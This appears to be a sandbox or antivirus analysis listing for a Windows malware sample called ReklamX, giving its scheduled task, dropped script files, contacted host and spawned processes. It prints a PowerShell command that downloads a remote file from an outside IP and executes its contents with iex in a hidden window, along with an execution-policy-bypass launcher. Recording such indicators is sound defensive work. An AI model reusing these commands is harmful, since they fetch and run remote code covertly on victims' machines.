Technical Information
- <SYSTEM32>\tasks\reklamx
- C:\users\public\reklamx.bat
- C:\users\public\reklamx.vbs
- '18#.#1.157.219':222
- http://18#.##.157.219:222/1.txt via 18#.#1.157.219
- http://18#.##.157.219:222/.xxx.jpg via 18#.#1.157.219
- '<SYSTEM32>\wscript.exe' "C:\Users\Public\ReklamX.vbs"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $xmldoc = New-Object System.Xml.XmlDocument; $xmldoc.'Load'('http://185.81.157.219:222/1.txt'); iex $xmldoc.command.a.execute (with hidden window)
- '<SYSTEM32>\wscript.exe' "C:\Users\Public\ReklamX.vbs" (with hidden window)
- '<SYSTEM32>\cmd.exe' /c ""C:\Users\Public\ReklamX.bat" " (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $xmldoc = New-Object System.Xml.XmlDocument; $xmldoc.'Load'('http://185.81.157.219:222/1.txt'); iex $xmldoc.command.a.execute
- '<SYSTEM32>\taskeng.exe' {CC2356BB-36A7-4BB4-9EBD-ECFE41A307EE} S-1-5-21-1238866942-1249195528-555854008-1000:spujdasx\user:Interactive:[1]
- '<SYSTEM32>\cmd.exe' /c ""C:\Users\Public\ReklamX.bat" "
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\ReklamX.ps1'"